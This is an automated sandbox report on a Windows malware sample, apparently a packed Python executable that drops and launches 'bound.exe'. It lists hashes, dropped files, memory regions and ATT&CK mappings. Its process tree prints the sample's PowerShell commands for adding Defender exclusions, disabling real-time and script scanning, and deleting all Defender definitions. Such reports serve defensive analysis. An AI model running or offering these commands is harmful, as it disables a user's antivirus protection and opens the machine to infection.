Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-07-2024 01:15

General

  • Target

    1e0a69e9ca53ac0bb49905f2155bb033.exe

  • Size

    7.6MB

  • MD5

    1e0a69e9ca53ac0bb49905f2155bb033

  • SHA1

    e729e02a43952b0fa87bd9990fd723871af27a9e

  • SHA256

    bdd78464454ecccd31467ad9dca6182a479eb5d30f567ea5fbc28bd3548f2b9c

  • SHA512

    1b6d13007aff1edd5a287906b2de1aa402518475b3720603af3087b318e3ba8a4891affa153cbba0b69c12a207e8be25e7926bf7de7cd0d64d7c2dcfbafd7700

  • SSDEEP

    196608:fJYS6ig3NSYOshoKMuIkhVastRL5Di3u01D7W:BYSdg9SYOshouIkPftRL54lRW

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1e0a69e9ca53ac0bb49905f2155bb033.exe
    "C:\Users\Admin\AppData\Local\Temp\1e0a69e9ca53ac0bb49905f2155bb033.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3916
    • C:\Users\Admin\AppData\Local\Temp\1e0a69e9ca53ac0bb49905f2155bb033.exe
      "C:\Users\Admin\AppData\Local\Temp\1e0a69e9ca53ac0bb49905f2155bb033.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1e0a69e9ca53ac0bb49905f2155bb033.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1e0a69e9ca53ac0bb49905f2155bb033.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4824
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4340
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          PID:5092
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1056
            5⤵
            • Program crash
            PID:4032
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5092 -ip 5092
    1⤵
      PID:3664

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      2e907f77659a6601fcc408274894da2e

      SHA1

      9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

      SHA256

      385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

      SHA512

      34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\VCRUNTIME140.dll
      Filesize

      106KB

      MD5

      49c96cecda5c6c660a107d378fdfc3d4

      SHA1

      00149b7a66723e3f0310f139489fe172f818ca8e

      SHA256

      69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

      SHA512

      e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_bz2.pyd
      Filesize

      48KB

      MD5

      c413931b63def8c71374d7826fbf3ab4

      SHA1

      8b93087be080734db3399dc415cc5c875de857e2

      SHA256

      17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

      SHA512

      7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_ctypes.pyd
      Filesize

      58KB

      MD5

      00f75daaa7f8a897f2a330e00fad78ac

      SHA1

      44aec43e5f8f1282989b14c4e3bd238c45d6e334

      SHA256

      9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

      SHA512

      f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_decimal.pyd
      Filesize

      106KB

      MD5

      e3fb8bf23d857b1eb860923ccc47baa5

      SHA1

      46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

      SHA256

      7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

      SHA512

      7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_hashlib.pyd
      Filesize

      35KB

      MD5

      b227bf5d9fec25e2b36d416ccd943ca3

      SHA1

      4fae06f24a1b61e6594747ec934cbf06e7ec3773

      SHA256

      d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

      SHA512

      c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_lzma.pyd
      Filesize

      85KB

      MD5

      542eab18252d569c8abef7c58d303547

      SHA1

      05eff580466553f4687ae43acba8db3757c08151

      SHA256

      d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

      SHA512

      b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_queue.pyd
      Filesize

      25KB

      MD5

      347d6a8c2d48003301032546c140c145

      SHA1

      1a3eb60ad4f3da882a3fd1e4248662f21bd34193

      SHA256

      e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

      SHA512

      b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_socket.pyd
      Filesize

      43KB

      MD5

      1a34253aa7c77f9534561dc66ac5cf49

      SHA1

      fcd5e952f8038a16da6c3092183188d997e32fb9

      SHA256

      dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

      SHA512

      ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_sqlite3.pyd
      Filesize

      56KB

      MD5

      1a8fdc36f7138edcc84ee506c5ec9b92

      SHA1

      e5e2da357fe50a0927300e05c26a75267429db28

      SHA256

      8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

      SHA512

      462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\_ssl.pyd
      Filesize

      65KB

      MD5

      f9cc7385b4617df1ddf030f594f37323

      SHA1

      ebceec12e43bee669f586919a928a1fd93e23a97

      SHA256

      b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

      SHA512

      3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\base_library.zip
      Filesize

      1.4MB

      MD5

      32ede00817b1d74ce945dcd1e8505ad0

      SHA1

      51b5390db339feeed89bffca925896aff49c63fb

      SHA256

      4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

      SHA512

      a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\blank.aes
      Filesize

      120KB

      MD5

      f9d287cda0d8884ab74a8aea6cdfa51f

      SHA1

      2e163991bcc2af411dc60af87b1e91e47eefceee

      SHA256

      4fde609f7d463fb6afad8d8ac51e0fc23b11725ef3b4cba2ac5af404f1aa2335

      SHA512

      d0ce8921782abf70833059a94fbbe5a03bc836c4e258c0a3ab67466a7593b0e374135fffccba85b132c656e920b699e15af2cb6f3246b5a4fcdf335dccbd1113

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\bound.blank
      Filesize

      244KB

      MD5

      2bc47c2042e9c93c98e47fc7c792ccb9

      SHA1

      bec260c7e4bb3f47b280979a47df0ece9d200fb6

      SHA256

      210ed943381d0608d64bf896b80ff2c000c661ccd2300b645b708aaa99427fcf

      SHA512

      789c886722c435003d08cee75b82e8aee7421ca90b9f844281148168ef8772ba084d70c31e4a3ca0e977aecc64879a2335c6a469d74ca794a12c3386353b7795

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\libcrypto-3.dll
      Filesize

      1.6MB

      MD5

      78ebd9cb6709d939e4e0f2a6bbb80da9

      SHA1

      ea5d7307e781bc1fa0a2d098472e6ea639d87b73

      SHA256

      6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

      SHA512

      b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\libffi-8.dll
      Filesize

      29KB

      MD5

      08b000c3d990bc018fcb91a1e175e06e

      SHA1

      bd0ce09bb3414d11c91316113c2becfff0862d0d

      SHA256

      135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

      SHA512

      8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\libssl-3.dll
      Filesize

      223KB

      MD5

      bf4a722ae2eae985bacc9d2117d90a6f

      SHA1

      3e29de32176d695d49c6b227ffd19b54abb521ef

      SHA256

      827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

      SHA512

      dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\python311.dll
      Filesize

      1.6MB

      MD5

      5f6fd64ec2d7d73ae49c34dd12cedb23

      SHA1

      c6e0385a868f3153a6e8879527749db52dce4125

      SHA256

      ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

      SHA512

      c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\rar.exe
      Filesize

      615KB

      MD5

      9c223575ae5b9544bc3d69ac6364f75e

      SHA1

      8a1cb5ee02c742e937febc57609ac312247ba386

      SHA256

      90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

      SHA512

      57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\rarreg.key
      Filesize

      456B

      MD5

      4531984cad7dacf24c086830068c4abe

      SHA1

      fa7c8c46677af01a83cf652ef30ba39b2aae14c3

      SHA256

      58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

      SHA512

      00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\select.pyd
      Filesize

      25KB

      MD5

      45d5a749e3cd3c2de26a855b582373f6

      SHA1

      90bb8ac4495f239c07ec2090b935628a320b31fc

      SHA256

      2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

      SHA512

      c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\sqlite3.dll
      Filesize

      622KB

      MD5

      dbc64142944210671cca9d449dab62e6

      SHA1

      a2a2098b04b1205ba221244be43b88d90688334c

      SHA256

      6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

      SHA512

      3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

    • C:\Users\Admin\AppData\Local\Temp\_MEI39162\unicodedata.pyd
      Filesize

      295KB

      MD5

      8c42fcc013a1820f82667188e77be22d

      SHA1

      fba7e4e0f86619aaf2868cedd72149e56a5a87d4

      SHA256

      0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

      SHA512

      3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2epssyei.4gb.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\bound.exe
      Filesize

      297KB

      MD5

      d8d6140c2f046968b7f8c645feb9eda1

      SHA1

      ff9ea44cc24ed92ce040711dbbadf28642fe7df6

      SHA256

      3c9332f933ed7e7fa23dd68db756398620e2a77aafbb8aa67b630ed1d2bd94aa

      SHA512

      6bb9780e388df014915a5cfd2ea3a7f400a818cca041331679a8d806ae14623e7c838a4c9edea0af54be4026820127d7e43232fb1fbd41f3537a87c823336f99

    • memory/3300-74-0x00007FFA0F2E0000-0x00007FFA0F3AD000-memory.dmp
      Filesize

      820KB

    • memory/3300-131-0x00007FFA004F0000-0x00007FFA00667000-memory.dmp
      Filesize

      1.5MB

    • memory/3300-65-0x00007FFA0F780000-0x00007FFA0F799000-memory.dmp
      Filesize

      100KB

    • memory/3300-67-0x00007FFA0F770000-0x00007FFA0F77D000-memory.dmp
      Filesize

      52KB

    • memory/3300-72-0x00007FF9FFFD0000-0x00007FFA004F0000-memory.dmp
      Filesize

      5.1MB

    • memory/3300-62-0x00007FFA004F0000-0x00007FFA00667000-memory.dmp
      Filesize

      1.5MB

    • memory/3300-73-0x00000137EBEC0000-0x00000137EC3E0000-memory.dmp
      Filesize

      5.1MB

    • memory/3300-71-0x00007FFA0F730000-0x00007FFA0F763000-memory.dmp
      Filesize

      204KB

    • memory/3300-80-0x00007FFA0F540000-0x00007FFA0F54D000-memory.dmp
      Filesize

      52KB

    • memory/3300-83-0x00007FFA0EAF0000-0x00007FFA0EC0C000-memory.dmp
      Filesize

      1.1MB

    • memory/3300-82-0x00007FFA13FB0000-0x00007FFA13FD3000-memory.dmp
      Filesize

      140KB

    • memory/3300-79-0x00007FFA0F550000-0x00007FFA0F564000-memory.dmp
      Filesize

      80KB

    • memory/3300-77-0x00007FFA0EC10000-0x00007FFA0F1F9000-memory.dmp
      Filesize

      5.9MB

    • memory/3300-180-0x00007FFA0EC10000-0x00007FFA0F1F9000-memory.dmp
      Filesize

      5.9MB

    • memory/3300-165-0x00007FFA0EC10000-0x00007FFA0F1F9000-memory.dmp
      Filesize

      5.9MB

    • memory/3300-58-0x00007FFA13DE0000-0x00007FFA13DF9000-memory.dmp
      Filesize

      100KB

    • memory/3300-56-0x00007FFA100F0000-0x00007FFA1011D000-memory.dmp
      Filesize

      180KB

    • memory/3300-150-0x00007FFA0EC10000-0x00007FFA0F1F9000-memory.dmp
      Filesize

      5.9MB

    • memory/3300-144-0x00007FFA0F2E0000-0x00007FFA0F3AD000-memory.dmp
      Filesize

      820KB

    • memory/3300-149-0x00000137EBEC0000-0x00000137EC3E0000-memory.dmp
      Filesize

      5.1MB

    • memory/3300-145-0x00007FF9FFFD0000-0x00007FFA004F0000-memory.dmp
      Filesize

      5.1MB

    • memory/3300-134-0x00007FFA0EC10000-0x00007FFA0F1F9000-memory.dmp
      Filesize

      5.9MB

    • memory/3300-49-0x00007FFA13FB0000-0x00007FFA13FD3000-memory.dmp
      Filesize

      140KB

    • memory/3300-50-0x00007FFA15020000-0x00007FFA1502F000-memory.dmp
      Filesize

      60KB

    • memory/3300-26-0x00007FFA0EC10000-0x00007FFA0F1F9000-memory.dmp
      Filesize

      5.9MB

    • memory/3300-133-0x00007FFA0F730000-0x00007FFA0F763000-memory.dmp
      Filesize

      204KB

    • memory/3300-132-0x00007FFA0F780000-0x00007FFA0F799000-memory.dmp
      Filesize

      100KB

    • memory/3300-130-0x00007FFA0FA10000-0x00007FFA0FA33000-memory.dmp
      Filesize

      140KB

    • memory/3300-61-0x00007FFA0FA10000-0x00007FFA0FA33000-memory.dmp
      Filesize

      140KB

    • memory/4824-129-0x00007FF9FF450000-0x00007FF9FFF11000-memory.dmp
      Filesize

      10.8MB

    • memory/4824-108-0x00007FF9FF450000-0x00007FF9FFF11000-memory.dmp
      Filesize

      10.8MB

    • memory/4824-97-0x00007FF9FF450000-0x00007FF9FFF11000-memory.dmp
      Filesize

      10.8MB

    • memory/4824-91-0x000002027F6A0000-0x000002027F6C2000-memory.dmp
      Filesize

      136KB

    • memory/4824-84-0x00007FF9FF453000-0x00007FF9FF455000-memory.dmp
      Filesize

      8KB

    • memory/5092-126-0x0000000004D60000-0x0000000004D6A000-memory.dmp
      Filesize

      40KB

    • memory/5092-120-0x0000000004CC0000-0x0000000004D52000-memory.dmp
      Filesize

      584KB

    • memory/5092-119-0x0000000005190000-0x0000000005734000-memory.dmp
      Filesize

      5.6MB

    • memory/5092-109-0x00000000003B0000-0x0000000000400000-memory.dmp
      Filesize

      320KB